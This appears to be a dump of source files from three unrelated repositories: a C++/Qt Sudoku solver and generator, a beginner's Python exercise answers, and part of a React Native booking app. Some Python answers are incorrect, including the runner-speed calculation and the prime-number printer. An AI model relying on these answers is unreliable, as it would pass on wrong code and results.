for (int i = 0; i < 9; i++)
{
if (utility::containsDuplicates(getRowValues(i)))
return false;
if (utility::containsDuplicates(getColValues(i)))
return false;
if (utility::containsDuplicates(getBoxValues(i)))
return false;
}
return true;
}
bool Sudoku::constraintsForCellOK(Position pos)
{
if (utility::containsDuplicates(getRowValues(pos.getRow())))
return false;
if (utility::containsDuplicates(getColValues(pos.getCol())))
return false;
if (utility::containsDuplicates(getBoxValues(pos.getBox())))
return false;
return true;
}
std::vector<Position> Sudoku::getUnFilledPositions()
{
std::vector<Position> result;
for (int i = 0; i < storage.size(); i++) {
if (!storage[i])
result.push_back(Position(i));
}
return result;
}
std::vector<Position> Sudoku::getFilledPositions()
{
std::vector<Position> result;
for (int i = 0; i < storage.size(); i++) {
if (storage[i])
result.push_back(Position(i));
}
return result;
}
int Sudoku::computeConstraintsFor(Position pos)
{
std::vector<int> constraints;
std::vector<int> rowValues = getRowValues(pos.getRow());
constraints.insert(constraints.end(), rowValues.begin(), rowValues.end());
std::vector<int> colValues = getColValues(pos.getCol());
constraints.insert(constraints.end(), colValues.begin(), colValues.end());
std::vector<int> boxValues = getBoxValues(pos.getBox());
constraints.insert(constraints.end(), boxValues.begin(), boxValues.end());
return utility::countUniqueValues(constraints);
}
void Sudoku::clearValues()
{
storage = std::vector<int>(NUM_ROW * NUM_COL);
}
Sudoku::~Sudoku()
{
}<file_sep>/SudokuSolverGUI/Utility.h
#pragma once
#include <vector>
namespace utility
{
bool containsDuplicates(std::vector<int> vector);
int countUniqueValues(std::vector<int> v);
}<file_sep>/SudokuSolverGUI/Parser.cpp
#include "Parser.h"
#include <fstream>
#include <iostream>
#include <sstream>
#include <ctype.h>
Sudoku* Parser::parseFile(std::string filename)
{
Sudoku *sudoku = new Sudoku();
std::ifstream infile(filename);
if (!infile.is_open())
throw std::invalid_argument("Could not open file: " + filename);
std::string line;
int row = 0;
while (getline(infile, line))
{
for (std::string::size_type col = 0; col < line.size(); col++)
{
char s = line[col];
if (isdigit(s))
{
int number = s - '0';
sudoku->setValue(number, Position(row, col));
}
}
row++;
}
return sudoku;
}<file_sep>/SudokuSolverGUI/SudokuSolver.cpp
#include "SudokuSolver.h"
#include <algorithm>
SudokuSolver::SudokuSolver(Sudoku *sudoku)
{
this->sudoku = sudoku;
}
void SudokuSolver::findAllSolutions()
{
deepthFirstSearch(true);
}
void SudokuSolver::findSolution()
{
deepthFirstSearch(false);
}
void SudokuSolver::deepthFirstSearch(bool findAllSolutions)
{
std::vector<Position> unfilledPositions = sudoku->getUnFilledPositions();
int level = 0;
numberOfBacktracks = 0;
while (level < unfilledPositions.size())
{
if (level == -1)
return;
Position pos = unfilledPositions[unfilledPositions.size() - level - 1];
int nextValue = sudoku->getValueFor(pos) + 1;
if (nextValue == 10) {
sudoku->setValue(0, pos);
level--;
numberOfBacktracks++;
continue;
}
for (int testValue = nextValue; testValue < 10; testValue++) {
sudoku->setValue(testValue, pos);
if (sudoku->constraintsForCellOK(pos)) {
bool solutionFound = (level == unfilledPositions.size() - 1);
if (solutionFound) {
solutions.push_back(*sudoku);
if (!findAllSolutions) {
return;
}
} else {
level++;
break;
}
}
}
}
}
std::string SudokuSolver::difficultyOfSudoku()
{
if (numberOfBacktracks == 0) {
return "No sudoku solved";
}
else if (numberOfBacktracks < 1000) {
return "Sudoku was easy!";
}
else if (numberOfBacktracks < 15000) {
return "Sudoku was medium";
}
else if (numberOfBacktracks < 35000) {
return "Sudoku was hard";
}
else {
return "Sudoku was level SAMURAI!";
}
}
SudokuSolver::~SudokuSolver()
{
}<file_sep>/SudokuSolverGUI/SudokuSolver.h
#pragma once
#include "Sudoku.h"
#include <Windows.h>
#include <iostream>
#include <sstream>
#include <ctime>
#include <cstdio>
class SudokuSolver
{
private:
Sudoku *sudoku;
int numberOfBacktracks;
void deepthFirstSearch(bool findAllSolutions);
public:
explicit SudokuSolver(Sudoku *sudoku);
void findAllSolutions();
void findSolution();
std::vector<Sudoku> solutions;
std::string difficultyOfSudoku();
~SudokuSolver();
};<file_sep>/SudokuSolverGUI/main.cpp
#include "SudokuWindow.h"
#include <QtWidgets/QApplication>
int main(int argc, char *argv[])
{
QApplication app(argc, argv);
SudokuWindow sudokuWindow;
sudokuWindow.show();
return app.exec();
}<file_sep>/SudokuSolverGUI/Utility.cpp
#include "Utility.h"
#include <unordered_map>
namespace utility
{
bool containsDuplicates(std::vector<int> v)
{
std::unordered_map<int, bool> m;
for (std::vector<int>::iterator it = v.begin(); it != v.end(); ++it) {
int i = *it;
if (m.find(i) != m.end())
return true;
else
m[i] = true;
}
return false;
}
int countUniqueValues(std::vector<int> v)
{
std::unordered_map<int, bool> m;
for (std::vector<int>::iterator it = v.begin(); it != v.end(); ++it) {
int i = *it;
m[i] = true;
}
return m.size();
}
}<file_sep>/SudokuSolverGUI/SudokuGenerator.cpp
#include "SudokuGenerator.h"
#include "SudokuSolver.h"
#include <ctime>
SudokuGenerator::SudokuGenerator()
{
srand(time(0));
}
SudokuGenerator::~SudokuGenerator()
{
}
Sudoku* SudokuGenerator::generate()
{
Sudoku *sudoku = new Sudoku();
fillSudoku(sudoku);
removeRandomValuesUntilOneSolution(sudoku);
return sudoku;
}
void SudokuGenerator::fillSudoku(Sudoku * sudoku)
{
while (true) {
sudoku->clearValues();
addRandomInitialValuesTo(sudoku);
SudokuSolver solver = SudokuSolver(sudoku);
solver.findSolution();
if (solver.solutions.size() > 0) {
sudoku = &solver.solutions[0];
break;
}
}
}
void SudokuGenerator::addRandomInitialValuesTo(Sudoku *sudoku)
{
for (int i = 1; i <= 9; i++) {
int storagePos = rand() % 80;
sudoku->setValue(i, Position(storagePos));
}
}
void SudokuGenerator::removeRandomValuesUntilOneSolution(Sudoku * sudoku)
{
std::vector<Position> removablePositions = sudoku->getFilledPositions();
while (true) {
int randomRemovablePosition = rand() % (removablePositions.size() - 1);
Position pos = removablePositions[randomRemovablePosition];
int oldValue = sudoku->getValueFor(pos);
sudoku->removeValue(Position(pos));
SudokuSolver solver = SudokuSolver(sudoku);
solver.findAllSolutions();
if (solver.solutions.size() == 0) {
sudoku->setValue(oldValue, pos);
}
if (solver.solutions.size() > 1) {
sudoku->setValue(oldValue, pos);
return;
}
removablePositions.erase(removablePositions.begin() + randomRemovablePosition);
}
}<file_sep>/SudokuSolverGUI/Position.h
#pragma once
const int NUM_ROW = 9;
const int NUM_COL = 9;
class Position
{
private:
int storagePos;
Position();
public:
explicit Position(int row, int col);
explicit Position(int storagePos);
int getRow();
int getCol();
int getStoragePos();
int getBox();
~Position();
};<file_sep>/SudokuSolverGUI/Parser.h
#pragma once
#include <string>
#include "Sudoku.h"
namespace Parser
{
Sudoku* parseFile(std::string filename);
};<file_sep>/SudokuSolverGUI/Sudoku.h
#pragma once
#include <vector>
#include "Position.h"
class Sudoku
{
private:
std::vector <int> storage;
std::vector<int> getRowValues(int row);
std::vector<int> getColValues(int col);
std::vector<int> getBoxValues(int number);
public:
Sudoku();
void setValue(int value, Position pos);
void removeValue(Position pos);
int getValueFor(Position pos);
bool allConstraintsOK();
bool constraintsForCellOK(Position pos);
std::vector<Position> getUnFilledPositions();
std::vector<Position> getFilledPositions();
int Sudoku::computeConstraintsFor(Position pos);
void Sudoku::clearValues();
~Sudoku();
};<file_sep>/SudokuSolverGUI/SudokuGenerator.h
#pragma once
#include "Sudoku.h"
class SudokuGenerator
{
private:
void addRandomInitialValuesTo(Sudoku *sudoku);
void fillSudoku(Sudoku *sudoku);
void removeRandomValuesUntilOneSolution(Sudoku *sudoku);
public:
SudokuGenerator();
~SudokuGenerator();
Sudoku* generate();
};
|
10f05fb66bb5272bbd647e11a70147b43413d1f9
|
[
"Markdown",
"C++"
] | 16 |
C++
|
dakesson/SudokuSolver
|
d554e38ed51818c44d351711218971e7cddd7927
|
2bd9ac3153fac6371601e17aeb761e1d399c7ca4
|
refs/heads/master
|
<repo_name>mpolis2/CodingNomads-PythonLabs<file_sep>/03_more_datatypes/2_lists/03_10_unique.py
'''
Write a script that creates a list of all unique values in a list. For example:
list_ = [1, 2, 6, 55, 2, 'hi', 4, 6, 1, 13]
unique_list = [55, 'hi', 4, 13]
'''
list_ = [1, 2, 6, 55, 2, 'hi', 4, 6, 1, 13]
unique_list=[]
for item in list_:
if list_.count(item) == 1:
unique_list.append(item)
else:
continue
print(f"the characters that only appear once are, {unique_list}")<file_sep>/02_basic_datatypes/2_strings/02_09_vowel.py
'''
Write a script that prints the total number of vowels that are used in a user-inputted string.
CHALLENGE: Can you change the script so that it counts the occurrence of each individual vowel
in the string and print a count for each of them?
'''
# get user sentence
sentence = input("type a sentence: ").lower()
# define vowels
A = sentence.count("a")
E = sentence.count("e")
I = sentence.count("i")
O = sentence.count("o")
U = sentence.count("u")
vowels = ['a', 'e', 'i', 'o', 'u']
print(A, E, I, O, U)
print(f"there are {A} a's")
print(f"there are {E} e's")
print(f"there are {I} i's")
print(f"there are {O} o's")
print(f"there are {U} u's")
print(f' {A+E+I+O+U} vowels total')
# locate vowels in sentence
# display totals for each and grand total for all vowells<file_sep>/02_basic_datatypes/2_strings/02_11_slicing.py
'''
Using string slicing, take in the user's name and print out their name translated to pig latin.
For the purpose of this program, we will say that any word or name can be
translated to pig latin by moving the first letter to the end, followed by "ay".
For example: ryan -> yanray, caden -> adencay
'''
#get name
name = input("type your name: ")
#get first letter
first_letter = name[0]
#remove first letter
name = name[1:]
#append first letter + 'ay' to end of word
name = name + first_letter + "ay"
print(name)
<file_sep>/03_more_datatypes/2_lists/03_11_split.py
'''
Write a script that takes in a string from the user. Using the split() method,
create a list of all the words in the string and print the word with the most
occurrences.
'''
user_string = input("type a word or short phrase: ")
as_list = user_string.split(" ")
count_list = []
for item in as_list:
count_list.append(as_list.count(item))
print("Highest number in occurance-list: " + str(max(count_list)))
highest_occurance = (max(count_list))
'''
find the highest number in count list, determine it's position in the list, and then use its posiion as the index for the word list.
this will find the word with the most occurnaces
'''
highest_occurance_index = (count_list.index(highest_occurance))
most_frequent_word = (as_list[highest_occurance_index]) #value at index of highest occurance
print(f'the word that occurs the most is "{most_frequent_word}"')<file_sep>/04_conditionals_loops/04_04_prime.py
'''
Print out every prime number between 1 and 100.
'''
for i in range (1,101):
# check for any even divisor
if i==2 or i == 5 or i == 7 or i == 11:
print(i)
if i % 3 == 0 or i % 5 == 0 or i % 7 == 0 or i % 11 == 0 or i % 2 == 0:
continue
else:
print(i)
<file_sep>/04_conditionals_loops/04_01_divisible.py
'''
Write a program that takes a number between 1 and 1,000,000,000
from the user and determines whether it is divisible by 3 using an if statement.
Print the result.
'''
number = int(input("type number between 1 - 1,000,000,000: "))
if number%3 == 0:
print(f'the result is {number/3}')
else:
print("this is not divisible by 3")<file_sep>/02_basic_datatypes/1_numbers/02_06_invest.py
'''
Take in the following three values from the user:
- investment amount
- interest rate in percentage
- number of years to invest
Print the future values to the console.
'''
amount = int(input("what is the amount to invest? "))
interest = int(input("What is the interest rate (in percent)? "))
years = int(input("how many years will you invest? "))
future_value = (amount * interest/100 * years) + amount
print(f'In {years} years, your initial principal of ${amount} will be worth ${future_value}')
<file_sep>/03_more_datatypes/3_tuples/03_12_list_to_tuple.py
'''
Write a script that takes a list and turns it into a tuple.
'''
list_ = ["hi", "bye", "see you soon"]
tuple_=tuple(list_)
print(tuple_)
print(type(tuple_))<file_sep>/01_python_fundamentals/01_02_seconds_years.py
'''
Move the code you previously wrote to calculate how many seconds are in a year into this file.
Then execute it as a script to see the output printed to your console.
'''
seconds_in_year = 60 * 60 * 24 * 365
print("there are " + str(seconds_in_year) + " seconds in a year")
print(f"there are {seconds_in_year} seconds in a year")
<file_sep>/04_conditionals_loops/04_07_search.py
'''
Receive a number between 0 and 1,000,000,000 from the user.
Use while loop to find the number - when the number is found exit the loop and print the number to the console.
'''
number = int(input("type a number from 0 - 1,000,000,000: "))
i= 0
while i <= 1000000000:
if i == number:
print(f"I found your number: {number}")
break
i += 1<file_sep>/02_basic_datatypes/2_strings/02_07_replace.py
'''
Write a script that takes a string of words and a symbol from the user.
Replace all occurrences of the first letter with the symbol. For example:
String input: more python programming please
Symbol input: #
Result: #ore python progra##ing please
'''
sentence = input("type a sentence: ")
symbol = input("now type a symbol: ").strip()
first_letter = sentence[0]
print (sentence.replace(first_letter, symbol))
<file_sep>/02_basic_datatypes/1_numbers/02_05_convert.py
'''
Demonstrate how to:
1) Convert an int to a float
2) Convert a float to an int
3) Perform floor division using a float and an int.
4) Use two user inputted values to perform multiplication.
Take note of what information is lost when some conversions take place.
'''
A = 5
B = float(A)
print (A / B)
C = input ("type a number: ")
D = input ("and another: ")
print(f'{C} x {D} is {int(C)*int(D)}')<file_sep>/02_basic_datatypes/2_strings/02_08_occurrence.py
'''
Write a script that takes a string of words and a letter from the user.
Find the index of first occurrence of the letter in the string. For example:
String input: hello world
Letter input: o
Result: 4
'''
sentence = input("type a short sentence: ")
letter = input("now type a single character to locate: ").strip()
print("result")
print(f'the first instance of "{letter}" is located at index[{sentence.find(letter)}]')<file_sep>/02_basic_datatypes/1_numbers/02_01_cylinder.py
'''
Write the necessary code calculate the volume and surface area
of a cylinder with a radius of 3.14 and a height of 5. Print out the result.
'''
# V=πr2h
# volume = pi * radius-squared * height
radius = 3.14
height = 5
pi = 3.14
volume = pi * radius ** 2 * height
print (f'volume = {volume}')
#surface area
#A=2πrh+2πr2
# area = (2 * pi * radius * height) + (2 * pi * radius-squared)
area = (2 * pi * radius * height) + (2 * pi * radius ** 2)
print (f'area = {area}')<file_sep>/04_conditionals_loops/04_05_sum.py
'''
Take two numbers from the user, one representing the start and one the end of a sequence.
Using a loop, sum all numbers from the first number through to the second number.
For example, if a user enters 1 and 100, the sequence would be all integer numbers from 1 to 100.
The output of your calculation should therefore look like this:
The sum is: 5050
'''
print("type the start and end of the range")
start = int(input("start: "))
end = int(input("end: "))
total = 0
for i in range (start, end + 1):
total += i
print(f'the total is {total}')
<file_sep>/03_more_datatypes/2_lists/03_06_product_largest.py
'''
Take in 10 numbers from the user. Place the numbers in a list.
Find the largest number in the list.
Print the results.
CHALLENGE: Calculate the product of all of the numbers in the list.
(you will need to use "looping" - a concept common to list operations
that we haven't looked at yet. See if you can figure it out, otherwise
come back to this task after you have learned about loops)
'''
mult_total = 1
numbers = []
for i in range (10):
new_num = int(input("type in a number: "))
numbers.append(new_num)
mult_total *= new_num #running total multiplying each new number
print(f'the largest number is {sorted(numbers)[-1]}')
print(f'multiplying all numbers = {mult_total}')<file_sep>/02_basic_datatypes/1_numbers/02_03_runner.py
'''
If a runner runs 10 miles in 30 minutes and 30 seconds,
What is his/her average speed in kilometers per hour? (Tip: 1 mile = 1.6 km)
'''
# conversions
minutes = 1
km = 1
mile = minutes * 3.05
mile = 1.6 * km
hour = minutes * 60
# ***
speed_km = km / hour
print(f'average speed is {speed_km} km/hour')<file_sep>/02_basic_datatypes/2_strings/02_10_most_characters.py
'''
Write a script that takes three strings from the user and prints them together with their length.
Example Output:
5, hello
5, world
9, greetings
CHALLENGE: Can you edit to script to print only the string with the most characters? You can look
into the topic "Conditionals" to solve this challenge.
'''
#get user words
word_1 = input("Type a word: ")
word_2 = input("Type a 2nd word: ")
word_3 = input("Type a 3rd word: ")
#print words, each with length
print(str(len(word_1)), word_1)
print(str(len(word_2)), word_2)
print(str(len(word_3)), word_3)<file_sep>/04_conditionals_loops/04_02_month.py
'''
Take in a number from the user and print "January", "February", ...
"December", or "Other" if the number from the user is 1, 2,... 12,
or other respectively. Use a "nested-if" statement.
'''
months = ["January", "February", "March", "April", "May", "June", "July", "August",
"September", "October", "November", "December"]
number = int(input("type a number: "))
if number <= 12:
print(months[number-1])
elif number > 12:
print("Other")
<file_sep>/03_more_datatypes/3_tuples/03_13_tuple_to_list.py
'''
Write a script that takes a tuple and turns it into a list.
'''
tuple_ = (2, 3, 4, 5)
#method 1 - lop[ & append
#list_=[]
#for item in tuple_:
# list_.append(item)
#method 2 - explicit type
list_ = list(tuple_)
print(list_)
print(type(list_))
|
4cb74ba21fe8a5a44d362c1e3a163d389c967148
|
[
"Python"
] | 20 |
Python
|
mpolis2/CodingNomads-PythonLabs
|
2efbfd2a03592ebaeb1b20c42dbd7b1ae75fc640
|
14a0503db2e3cb7f605bf3c87f021ab84cd92317
|
refs/heads/master
|
<repo_name>tzq668766/rest-client<file_sep>/mac-run-ui.sh
#!/bin/sh
VERSION=`head pom.xml | grep 'version.*version' | sed -E 's/.*version.(.*)..version.*/\1/g'`
java -Dorg.apache.commons.logging.Log=org.apache.commons.logging.impl.SimpleLog -Dorg.apache.commons.logging.simplelog.log.org.apache.http.wire=DEBUG -Dapple.laf.useScreenMenuBar=true -Dapple.awt.application.name=RESTClient -jar restclient-ui/target/restclient-ui-$VERSION-jar-with-dependencies.jar
|
7d272f906662034f51eebea9ae07b0ec8d78ca7e
|
[
"Shell"
] | 1 |
Shell
|
tzq668766/rest-client
|
14a5ea43ba083d6759fbb37835e8ce8d2a91f0f0
|
ccc0b6bb1a861f1070c831cf2faa6dcd2a4b49e5
|
refs/heads/master
|
<file_sep>import { Dimensions, StyleSheet } from "react-native";
const styles = StyleSheet.create({
container : {
height: '100%',
justifyContent: "space-between"
},
row:{
flexDirection: 'row',
alignItems: 'center',
justifyContent: 'space-between',
paddingVertical: 20,
borderBottomWidth: .5,
borderBottomColor: '#cccccc',
marginHorizontal:20
},
title:{
},
buttons: {
flexDirection: 'row',
color: 'red',
alignItems: 'center'
},
number:{
marginHorizontal: 20,
},
buttonText:{
fontSize: 30
},
numButton: {
borderWidth: 1,
width: 30,
height: 30,
justifyContent: "center",
alignItems: 'center',
borderRadius: 15,
borderColor: '#b8b8b8'
},
searchButton:{
backgroundColor: '#f15454',
width: Dimensions.get('window').width -20,
paddingVertical: 20,
marginBottom: 10,
marginHorizontal: 10,
borderRadius: 10,
alignItems: 'center'
},
searchButtonText: {
color: 'white',
fontWeight: '700',
fontSize: 20
}
})
export default styles;
<file_sep>import React from 'react'
import { View, Text, Image,Pressable } from 'react-native'
import styles from './styles.js'
import { useNavigation } from '@react-navigation/native'
const Accommodation = (props) => {
const days = 3
const post = props.post
const navigator = useNavigation()
return (
<Pressable
style={styles.container}
onPress={() => {
navigator.navigate("Accommodation Details", {postId : post.id})
}}
>
{/* Image */}
<Image
source={{uri: post.image}}
style={styles.image}
/>
{/* Bed and Bedroom */}
<Text style={styles.bed}>{post.bed} Bed {post.bedroom} Bedroom</Text>
{/* Description */}
<Text style={styles.description} numberOfLines={3}>
<Text style={styles.room}>{post.type} </Text>
{post.title}
</Text>
{/* Old Price and New Price */}
<Text style={styles.price}>
<Text style={styles.oldPrice}>${post.oldPrice}</Text>
<Text style={styles.newPrice}> ${post.newPrice}</Text>
/ Night
</Text>
{/* Total Price */}
<Text style={styles.totalPrice}>${post.newPrice * days} total</Text>
</Pressable>
)
}
export default Accommodation
<file_sep>import React from 'react'
import {createMaterialTopTabNavigator} from '@react-navigation/material-top-tabs'
import SearchResultScreen from '../screens/SearchResult'
import MapScreen from '../screens/Map';
import { useRoute } from '@react-navigation/native'
const SearchResultsTabNavigator = () => {
const route = useRoute()
const Tab = createMaterialTopTabNavigator()
return (
<Tab.Navigator tabBarOptions={{
activeTintColor: '#f15454',
indicatorStyle:{
backgroundColor: '#f15454'
}
}}>
<Tab.Screen name={'list'}>
{() => <SearchResultScreen guests={route.params.guests}/>}
</Tab.Screen>
<Tab.Screen name={'map'}>
{() => <MapScreen guests={route.params.guests}/>}
</Tab.Screen>
</Tab.Navigator>
)
}
export default SearchResultsTabNavigator;
<file_sep>import API from '@aws-amplify/api'
import { graphqlOperation } from '@aws-amplify/api-graphql'
import React, { useEffect, useState } from 'react'
import { View, FlatList,Text } from 'react-native'
import feed from '../../assets/data/feed'
import Accommodation from '../../components/Accommodation'
import {listPosts} from '../../graphql/queries'
const SearchResultScreen = (props) => {
const {guests} = props
const [post, setPost] = useState([])
const fetchPosts = async () =>{
const posts = await API.graphql(
graphqlOperation(listPosts, {
filter:{
maxGuests: {
ge: guests
}
}
})
)
return posts
}
useEffect(() =>{
fetchPosts()
.then(posts => setPost(posts.data.listPosts.items))
.catch(e => console.log(e))
},[])
return (
<View>
<FlatList
data={post}
renderItem={({item}) => <Accommodation post={item} /> }
showsVerticalScrollIndicator={false}
/>
</View>
)
}
export default SearchResultScreen;
<file_sep>import {StyleSheet} from 'react-native'
const styles = StyleSheet.create({
container : {
margin : 10,
marginVertical: 20
},
image : {
width: '100%',
aspectRatio: 3 / 2,
borderRadius : 10
},
bed : {
paddingTop: 10,
color : '#CDCDCD',
fontSize: 14,
fontWeight: '700'
},
description : {
fontSize: 18,
textAlign: 'justify',
lineHeight: 24
},
room : {
fontWeight: '700'
},
price : {
fontSize: 18,
marginTop: 4
},
oldPrice : {
color: '#5b5b5b',
fontWeight: '700',
textDecorationLine: 'line-through'
},
newPrice :{
fontWeight: '700'
},
totalPrice : {
fontSize: 14,
color: '#5b5b5b',
textDecorationLine: 'underline',
marginTop: 4
},
longDescription :{
marginTop: 10,
textAlign: 'justify',
lineHeight: 20,
fontSize: 16
}
})
export default styles;
<file_sep>export default [
{
id: '0',
image: 'https://notjustdev-dummy.s3.us-east-2.amazonaws.com/images/1.jpg',
type: 'Private Room',
title: 'Bright room in the heart of the city',
bed: 2,
bedroom: 3,
oldPrice: 25,
newPrice: 20,
totalPrice: 120,
coordinate: {
latitude: 28.3915637,
longitude: -16.6291304,
},
longDescription: '"Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?"'
},
{
id: '1',
image: 'https://notjustdev-dummy.s3.us-east-2.amazonaws.com/images/2.jpg',
type: 'Entire Flat',
title: 'NEW lux. apartment in the center of Santa Cruz',
bed: 3,
bedroom: 2,
oldPrice: 76,
newPrice: 65,
totalPrice: 390,
coordinate: {
latitude: 28.4815637,
longitude: -16.2291304,
},
longDescription: '"Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?"'
},
{
id: '2',
image: 'https://notjustdev-dummy.s3.us-east-2.amazonaws.com/images/3.jpg',
type: 'Private Property',
title: 'Green House Santa Cruz',
bed: 2,
bedroom: 1,
oldPrice: 64,
newPrice: 55,
totalPrice: 330,
coordinate: {
latitude: 28.2515637,
longitude: -16.3991304,
},
longDescription: '"Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?"'
},
{
id: '3',
image: 'https://notjustdev-dummy.s3.us-east-2.amazonaws.com/images/4.jpg',
type: 'Entire Flat',
title: 'Typical canarian house',
bed: 4,
bedroom: 3,
oldPrice: 120,
newPrice: 100,
totalPrice: 600,
coordinate: {
latitude: 28.4815637,
longitude: -16.2991304,
},
longDescription: '"Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?"'
},
];
<file_sep>import { useNavigation } from '@react-navigation/native'
import React, {useState} from 'react'
import { View, Text, Pressable } from 'react-native'
import styles from './styles'
const GuestScreen = () => {
const [adults, setAdults] = useState(0)
const [children, setChildren] = useState(0)
const [infants, setInfants] = useState(0)
const navigation = useNavigation()
return (
<View style={styles.container}>
<View>
{/* Adult Row */}
<View style={styles.row}>
{/* Row Name */}
<View style={styles.title}>
<Text style={{fontWeight: '700'}}>Adults</Text>
<Text style={{color: '#b8b8b8'}}>13 years up and up</Text>
</View>
{/* Buttons */}
<View style={styles.buttons}>
{/* - */}
<Pressable
style={styles.numButton}
onPress={() => setAdults(Math.max(0,adults - 1))}
>
<Text style={{fontSize: 20, color: '#b8b8b8'}}>-</Text>
</Pressable>
{/* value */}
<Text style={styles.number}>{adults}</Text>
{/* + */}
<Pressable
style={styles.numButton}
onPress={() => setAdults(adults + 1)}
>
<Text style={{fontSize: 20, color: '#b8b8b8'}}>+</Text>
</Pressable>
</View>
</View>
{/* Children Row */}
<View style={styles.row}>
{/* Row Name */}
<View style={styles.title}>
<Text style={{fontWeight: '700'}}>Children</Text>
<Text style={{color: '#b8b8b8'}}>3 to 12</Text>
</View>
{/* Buttons */}
<View style={styles.buttons}>
{/* - */}
<Pressable
style={styles.numButton}
onPress={() => setChildren(Math.max(0,children - 1))}
>
<Text style={{fontSize: 20, color: '#b8b8b8'}}>-</Text>
</Pressable>
{/* value */}
<Text style={styles.number}>{children}</Text>
{/* + */}
<Pressable
style={styles.numButton}
onPress={() => setChildren(children + 1)}
>
<Text style={{fontSize: 20, color: '#b8b8b8'}}>+</Text>
</Pressable>
</View>
</View>
{/* Infant Row */}
<View style={styles.row}>
{/* Row Name */}
<View style={styles.title}>
<Text style={{fontWeight: '700'}}>Infants</Text>
<Text style={{color: '#b8b8b8'}}>0 to 1</Text>
</View>
{/* Buttons */}
<View style={styles.buttons}>
{/* - */}
<Pressable
style={styles.numButton}
onPress={() => setInfants(Math.max(0,infants - 1))}
>
<Text style={{fontSize: 20, color: '#b8b8b8'}}>-</Text>
</Pressable>
{/* value */}
<Text style={styles.number}>{infants}</Text>
{/* + */}
<Pressable
style={styles.numButton}
onPress={() => setInfants(infants + 1)}
>
<Text style={{fontSize: 20, color: '#b8b8b8'}}>+</Text>
</Pressable>
</View>
</View>
</View>
{/* Search Button */}
<Pressable
onPress={() =>
navigation.navigate('Home', {
screen: 'Explorer',
params: {
screen: 'SearchResult',
params: {
guests: adults + children + infants
}
}
})
}
style={styles.searchButton}
>
<Text style={styles.searchButtonText}>
Search
</Text>
</Pressable>
</View>
)
}
export default GuestScreen;
<file_sep>import React from 'react'
import { View, Text, Pressable } from 'react-native'
import { Auth } from 'aws-amplify';
const ProfileScreen = () => {
return (
<View style={{display: 'flex', justifyContent: 'center', alignItems: 'center', height: '100%'}}>
<Pressable
style={{backgroundColor: 'orange', padding: 5,borderRadius: 5, paddingHorizontal: 20}}
onPress={() => Auth.signOut()}
>
<Text style={{color: 'white', fontSize: 16, fontWeight: '700'}}>
Sign Out
</Text>
</Pressable>
</View>
)
}
export default ProfileScreen;
<file_sep>import { StyleSheet } from "react-native";
const styles = StyleSheet.create({
container : {
marginHorizontal: 20
},
textInput : {
fontSize: 20,
marginBottom: 20,
marginTop: 50
},
row : {
flexDirection: 'row',
alignItems: 'center',
borderBottomColor: '#5b5b5b',
borderBottomWidth: .5,
padding: 16
},
iconContainer : {
backgroundColor: '#cdcdcd',
borderRadius: 5,
padding: 5,
marginEnd: 10
},
locationText : {
fontSize: 16,
},
placeIcon:{
height: 25,
width: 25
}
})
export default styles;
<file_sep>import {StyleSheet, Dimensions} from 'react-native'
const styles = StyleSheet.create({
image : {
width: '100%',
height: 500,
resizeMode: 'contain',
justifyContent: 'center',
},
text : {
color: 'white',
fontWeight: '700',
fontSize: 80,
width: '70%',
padding: 20
},
button : {
marginStart: 20,
backgroundColor: 'white',
padding: 5,
width: 200,
borderRadius: 5,
alignItems: 'center',
},
buttonText : {
fontWeight: '700'
},
searchButton : {
alignItems: 'center',
zIndex: 100,
position: 'absolute',
top: 20,
width: Dimensions.get('screen').width - 20,
flexDirection: 'row',
